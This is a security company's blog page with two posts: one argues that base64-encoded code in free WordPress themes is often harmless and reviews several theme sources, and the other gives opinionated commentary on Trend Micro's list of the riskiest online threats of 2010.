WeWatchYourWebsite

"so you don't have to!"

By

Why You Should Never Avoid Free WordPress Themes Just Because They’re Encoded

This might be a little on the controversial side, but as a security specialist, I believe that too often people are getting “hyped-up” over obfuscated code.

I recently read a blog post titled, “Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else” and while I commend the writer for researching this topic, I also felt compelled to write this rebuttal.

Too often people start reading that hackers are using base64_decode in their infections and then begin searching their sites for this string and become alarmists when they find it.

“Oh no! How did this happen to my site?”

“What do I do now?”

People – it’s used in many, many legitimate ways as well.

Not to discredit the author of the original research, but I did want to provide further details from a security specialists point of view.

I’ll dive into a few of the themes that were listed in the original post.

1. Downloading PRiNZ Branford Magazine theme from WordPressthemesbase.com resulted in a zip file that required a password. Further investigation uncovered this as a possible unauthorized copy of an older version of this theme. While this theme may be harmful to your website, we decided to drop our investigation of this one as you can’t open the downloaded copy from wordpressthemesbase.com anyway.

Result: BAD!!! If you want this theme, get it from http://www.der-prinz.com and pay the $40 – $45 and be done with it.

2. We downloaded the BeautyStore theme from http://www.freewordpressthemes.com and looked at the footer.php which was identified by the original poster as having “severe warnings”. Our deobfuscator showed us this in the footer.php:

deobfuscated php code

Nothing malicious looking there. Appears to be typical footer type code.

Result: Safe. This is an example of not fully decoding or deobfuscating code and assuming it’s bad – this isn’t.

3. We downloaded a number of themes from the site: www.themes2wp.com, however out of 4 downloads, they were all empty. Not sure what was going on there.

From the research performed by the original poster, you can remove the links and have a nice theme. You can’t assume that code using an eval statement is bad. It’s used millions of times in legitimate code.

4. I’ll agree with the original poster on the them downloaded from FreeWPThemes – they should be updated to conform with the WordPress 3.0 standards.

Result: I’d look for other themes that have been updated.

5. Obviously getting free WordPress themes from WordPress.org is going to be your safest option of them all.

Result: Go ahead and do it.

6. The FUNDA theme from themes.rock-kitty.net was downloaded and analyzed next.

In the original poster’s review of this theme, a number of eval(base64_decode strings were identified.

The first one we looked at was in the file: functions.php. It starts out:

This decoded to:

Again – safe.

Analyzing the other base64_decode strings in the functions.php file showed they were harmless as well. I will admit that there are links to various websites embedded in the base64_decodings, but they are harmless. If I were to make a suggestion to the people running the website we downloaded this theme from, it would be to stop using popular themes to build their backlinks.

The website: themes.rock-kitty.net is registered to: Artem Minaev. One of the links embedded in the base64_decode string is: bestincellphones.com, which is a private domain registration so we don’t know who it belongs to, but someone at themes.rock-kitty.net is getting something out of embedding links. We downloaded the FUNDA theme from www.newwpthemes.com and found it did not have any of the links or base64_decode in it so we can only conclude that it was embedded at Rock-kitty.

Result: While maybe sneaky, the theme downloaded from Rock-kitty is safe, although I would download it from newwpthemes.com instead.

Closing: I’m not going to bore you with the details of the other themes. The point here is that you can’t just assume that since a theme, a widget or a plugin is using base64_decode, that it’s bad or malicious.

I do give an “up-top”, as my wife would say, to the original poster for the research, but I would declare many of the themes safe.

If there’s a theme you want analyzed by us, send me an email or post a comment here with the website link and we’ll download it, analyze it and report on it. If this becomes a real popular topic, we’ll create a free analyzer and post it on our website.

Thank you for reading this far. Let’s be safe out there, but not make false accusations of harmless themes.

By

What were the greatest risks online in 2010?

While I was reading Trend Micro’s blog (http://blog.trendmicro.com/2010s-most-dangerous-list/) I felt compelled to share it with our readers and give you my comments on it as well.

I’ll skip the hardware section as I’m sure not many of us use the German Identification card reader.

The first section I’ll comment on is Website Software. Here they list WordPress as the riskiest software used by websites in 2010. Is it really the riskiest? Or are the unpatched, non-updated sites the riskiest?

Trend Micro’s blog does state that tens of thousands of unpatched WordPress blogs were used by cybercriminals. So they do differentiate there. But as far as I’m concerned, there is other website software that is a greater risk than WordPress. At least WordPress is patched on a continual basis.

Something like osCommerce might be riskier. It hadn’t been updated in awhile and because it’s used for ecommerce, the hackers have more to gain by infecting osCommerce sites than they do a blog – don’t you agree? Wouldn’t stolen credit cards be a greater risk than infecting a blog?

I know that quite often the hackers are after infecting PCs and the best way of accomplishing that task is through the browser via websites, but if they can get a frequently used ecommerce site and just steal the information there, they don’t even have to worry about the circumventing the anti-virus protection on a PC.

Granted, there are probably more outdated WordPress blogs than there are vulnerable ecommerce sites, but is that really riskier?

The next category in the Trend Micro blog was IP (Internet Protocol). Here they list Internet Relay Chat (IRC) as the riskiest protocol. Again, I don’t totally disagree with them, but their reason is that 30% of all botnets used IRC to communicate with infected machines. Does that make it a greater risk?

Is IRC something that should be blocked by most firewalls? I belive so. But to classify it as the riskiest IP, I’m not sure I buy into that. If you go with their logic for listing WordPress as the riskiest software because it’s used most often by hackers, then why isn’t HTTP the riskiest IP? That’s how most infections happen is through infected websites.

This next category is sure to get a rise out of my friend Danny and my brother-in-law.

The riskiest operating system, according to Trend Micro’s research was…Apple’s Mac OS X. Again, as much as I’d like to jump up and cheer at the top of my lungs, it just isn’t going to happen.

I agree that many Mac users feel they’re impervious to infectious websites because “I have a Mac” and that this thinking alone makes many Mac users more prone to infection, I can’t agree that this is the riskiest operating system.

I enjoy my canned response when someone with a Mac tells me they never worry about viruses since they have a Mac. I reply with, “Without any way of detecting it (since rarely do they have an anti-virus installed on their Macs) how do you know?”

That’s just me being me. But I still can’t agree with Trend Micro.

My last disagreement with them is their pick for the most infectious website – Google.

What?

The rulers of the Internet (I say that with the utmost respect for Google) are the most infectious website? I don’t agree. Trend Micro’s research states that “It’s tremendous popularity led cybercriminals to target it specifically for blackhat SEO-related schemes…”

Just because you’re popular and used by cybercriminals for their nefarious schemes doesn’t make you risky. With that thinking in mind, I might list the Detroit Redwings website as the riskiest.

Do we need more Redwings fans? I think not! (This is totally based on my lifelong love affair with the Blackhawks and nothing more.)

The last category I’ll comment on is Social Network. Trend Micro’s research lists Facebook. They say, “Facebook could be considered the most dangerous social networking site around.”

Here, I agree. Think of how much time is wasted by people snooping into other people’s lives. Think of how much time people spend on Farmville. What if we got everyone to focus on a cure for cancer during their usual time of playing on Farmville.

Come on, let’s rally the troops here and cure cancer.

Next, for a special certain someone, we’ll knock out AIDS – worldwide. (That would prevent a trip to Africa.)

After AIDS, we’ll cure ALS. All this with time spent playing Farmville. After ALS we’ll have to cure racism, prejudging and hatre, just to make it a perfect world.

Now I realize that many aren’t going to agree with my disagreements -but that’s the beauty of the Internet. You can voice your opinion and in the end we can agree to disagree.

What’s your opinion?

Please share it.

Thank you.